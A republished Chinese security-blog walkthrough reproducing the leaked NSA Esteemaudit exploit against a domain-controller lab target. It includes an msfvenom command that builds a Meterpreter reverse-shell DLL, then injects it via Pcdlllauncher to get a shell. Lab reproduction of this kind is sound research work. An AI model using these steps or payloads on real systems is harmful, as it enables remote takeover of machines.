专栏首页FreeBufShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。

前期准备

靶机环境

需要域控环境

Esteemaudit漏洞复现过程

use Esteemaudit使用漏洞模块

设置目标IP和端口

然后基本上默认,基本配置如下:

运行后再进行配置。

然后基本上选择相对应的设置,CallbackIp填自己的,端口随便

然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:

然后基本上配置如下

可以运行了

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

use Pcdlllauncher

然后生成用于反弹shell的dll payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll

然后进行配置

找到自己对应的文件路径修改

要注入的恶意DLL文件路径

然后基本上默认,运行就行了,成功注入

查看Metasploit,成功返回shell

本文分享自微信公众号 - FreeBuf(freebuf),作者:zusheng

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-04-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 缺乏速率限制导致的Instagram账户密码枚举

    今天分享的这篇Writeup关于速率限制问题(请求次数限制,Rate Limitation),这也是面向公众网站的设计中常常会忽略掉的防护措施,利用速率限制漏洞...

    FB客服
  • 利用COVID-19发起的网络攻击分析

    Check Point发现了针对蒙古公共部门的网络攻击活动,该组织利用了冠状病毒恐慌情绪向目标发送恶意软件。研究发现其与可与在2016年进行的其他网络活动联系起...

    FB客服
  • 红蓝对抗中的近源渗透

    近源渗透是这两年常被安全业内人员谈起的热门话题。不同于其他虚无缥缈的安全概念,近源渗透涉及到的无线安全、物理安全、社会工程学都十分容易落地实践,许多企业内部的攻...

    FB客服
  • salesforce 零基础开发入门学习(二)变量基础知识,集合,表达式,流程控制语句

    salesforce如果简单的说可以大概分成两个部分:Apex,VisualForce Page. 其中Apex语言和java很多的语法类似,今天总结的是一些简...

    用户1169343
  • 机器学习的一些术语

    卷积神经网络最初是用来处理多维数组数据,比如,一张由三个2D数组组成、包含三个彩色通道像素强度的彩色图像。大量的数据模式都是多个数组形式:1D用来表示信号和序列...

    ocean1208
  • 6.1 压缩打包介绍

    家用带宽和机房带宽的区别: 家用的IP是动态的、不固定的,而机房的IP 家用的上传和下载带宽也是不同的;而在机房中的带宽,下载和上传带宽都是相同的 举例:家用...

    运维小白
  • 你必须知道的23个最有用的Elasticseaerch检索技巧

    本文详细论述了Elasticsearch全文检索、指定字段检索实战技巧,并提供了详尽的源码举例(微信有字数限制,删除了代码,详见博客)。是不可多得学习&实战资料...

    铭毅天下
  • [javaweb]Java过滤器与包装设计模式的实用案例.

    一枝花算不算浪漫
  • 并发学习笔记05-重排序

    在计算机中,软件技术和硬件技术有一个共同的目标:在不改变程序执行结果的前提下,尽可能提高并行度。

    汐楓
  • shiro之深度解析FormAuthenticationFilter

      shiro是我们在项目经常使用到的权限管理框架,本文我们就重点来分析FormAuthenticationFilter的验证过程。

    用户4919348

扫码关注云+社区

领取腾讯云代金券